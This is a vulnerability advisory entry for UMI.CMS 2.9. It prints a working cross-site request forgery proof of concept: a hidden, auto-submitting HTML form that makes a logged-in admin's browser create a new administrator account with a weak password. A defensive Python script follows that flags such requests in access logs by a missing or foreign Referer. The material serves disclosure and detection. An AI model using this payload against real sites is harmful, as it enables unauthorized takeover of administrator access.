UMI.CMS 2.9 - CSRF Vulnerability

2014-07-01T00:00:00
ID SSV:79111
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
Add an administrator user: csrfuser|||password
<form action="http://[host]/admin/users/add/user/do/" method="post" name="main">
<input type="hidden" name="data[new][login]"        value="csrfuser">
<input type="hidden" name="data[new][password][]"   value="password">
<input type="hidden" name="data[new][e-mail]"       value="user@mail.com">
<input type="hidden" name="data[new][is_activated]" value="1">
<input type="hidden" name="data[new][fname]"        value="username">
<input type="hidden" name="data[new][groups][]"     value="1">
<input type="hidden" name="data[new][groups][]"     value="2">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
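
A defender-side check for the request this form produces, as an added example that is not part of the original advisory: it scans web access logs for POSTs to the user-add path whose Referer is missing or points at another host. It assumes Combined Log Format; the host name `cms.example` and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Path taken from the form action in the advisory above.
USER_ADD_PATH = "/admin/users/add/user/do/"

# Combined Log Format: ip ident user [time] "METHOD path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def suspicious_user_adds(lines, site_host):
    """Return (time, ip, reason) for POSTs to the user-add endpoint whose
    Referer is absent or names a host other than site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        if urlsplit(m["path"]).path != USER_ADD_PATH:
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            hits.append((m["time"], m["ip"], "no referer"))
            continue
        ref_host = (urlsplit(referer).hostname or "").lower()
        if ref_host != site_host.lower():
            hits.append((m["time"], m["ip"], "foreign referer: " + ref_host))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2014:10:00:00 +0000] "POST /admin/users/add/user/do/ HTTP/1.1" '
    '302 0 "http://cms.example/admin/users/add/user/" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jul/2014:10:05:00 +0000] "POST /admin/users/add/user/do/ HTTP/1.1" '
    '302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jul/2014:10:06:00 +0000] "POST /admin/users/add/user/do/ HTTP/1.1" '
    '302 0 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [01/Jul/2014:10:07:00 +0000] "GET /admin/users/add/user/do/ HTTP/1.1" '
    '200 512 "http://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_user_adds(SAMPLE_LOG, "cms.example"):
        print(hit)
```

A hit is a lead to compare against the accounts actually present in the CMS; a missing Referer also occurs with privacy settings and proxies, so it is weaker evidence than a foreign one.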